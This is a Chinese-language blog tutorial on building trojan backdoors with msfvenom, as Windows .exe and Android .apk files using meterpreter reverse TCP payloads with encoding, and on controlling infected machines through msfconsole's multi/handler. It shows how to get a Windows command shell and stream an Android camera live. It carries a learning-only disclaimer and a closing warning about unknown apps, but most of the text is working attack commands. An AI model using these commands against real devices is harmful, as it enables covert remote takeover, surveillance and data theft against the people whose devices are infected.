admin 管理员组

文章数量: 887021

文章目录

  • 一、使用环境
  • 二、msfvenom编写Trojan木马
    • Ⅰ、电脑端.exe格式
    • Ⅱ、移动端.apk格式
  • 三、msfconsole控制感染对象
    • Ⅰ、电脑端示例:`shell`获取Windows的CMD
    • Ⅱ、移动端示例:`webcam_stream`获取Android摄像头实时画面

免责声明:本文章仅供网络安全方面学习、交流使用,任何操作与作者无关
请遵守我国法律法规

一、使用环境

  1. VMware V15.5.0
  2. Kali-Linux-2020.2
  3. msfconsole
  4. msfvenom
  5. Windows Server 2008 R2 Enterprise
  6. Android10 & EMUI10.1

二、msfvenom编写Trojan木马

在Kali的终端使用msfvenom命令制作后门木马程序

Ⅰ、电脑端.exe格式

在终端输入以下指令以生成木马

msfvenom -p windows/meterpreter_reverse_tcp LHOST={Kali系统IP} LPORT={监听端口} -e x86/shikata_ga_nai -f exe -o /home/用户名/桌面/{文件名}.exe -i 5
可选参数描述
-p使用平台
-e编码方式
-f文件格式
-o存储为
-i编译次数
-x捆绑软件

平台选择windows/meterpreter_reverse_tcp

Ⅱ、移动端.apk格式

msfvenom -p android/meterpreter_reverse_tcp R > /home/用户名/桌面/{文件名}.apk

平台选择android/meterpreter_reverse_tcp
保存方式与电脑端不同

三、msfconsole控制感染对象

两平台主要操作相同,区别在于参数

当在Windows中打开制作好的木马后,后门便会自动开放,程序后台静默运行
在Android打开后也是同理。安全软件会直接识别并报毒

在Kali终端使用msfconsole控制感染对象
加载exploit/multi/handler模块

设置载荷,Windows和Android的载荷与制作程序时输入的-p参数一致
windows/meterpreter_reverse_tcp
android/meterpreter_reverse_tcp

最后再设置LHOST和LPORT与程序的参数一致
指向Kali系统IP

配置完毕,run运行监听

Ⅰ、电脑端示例:shell获取Windows的CMD

Ⅱ、移动端示例:webcam_stream获取Android摄像头实时画面

提高警惕,切勿安装不明来源的程序软件

欢迎在评论区留言
感谢浏览

本文标签: 木马 手机 amp msfvenom msfconsole